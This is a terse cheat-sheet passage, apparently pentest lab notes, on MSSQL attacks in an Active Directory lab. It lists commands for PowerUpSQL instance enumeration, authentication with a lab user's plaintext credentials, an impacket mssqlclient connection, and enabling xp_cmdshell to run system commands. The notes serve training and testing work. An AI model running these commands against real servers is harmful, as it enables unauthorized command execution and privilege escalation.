mssql-server
Run enumeration
Import-module .\PowerUpSQL.ps1Get-SQLInstanceDomainAuthenticate with MSSQL
Get-SQLQuery -Verbose -Instance "<SQL_server_ip>,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'mssqlclient.py INLANEFREIGHT/DAMUNDSEN@<sql_server-ip> -windows-authHelpenable_xp_cmdshellxp_cmdshell whoami /privLast updated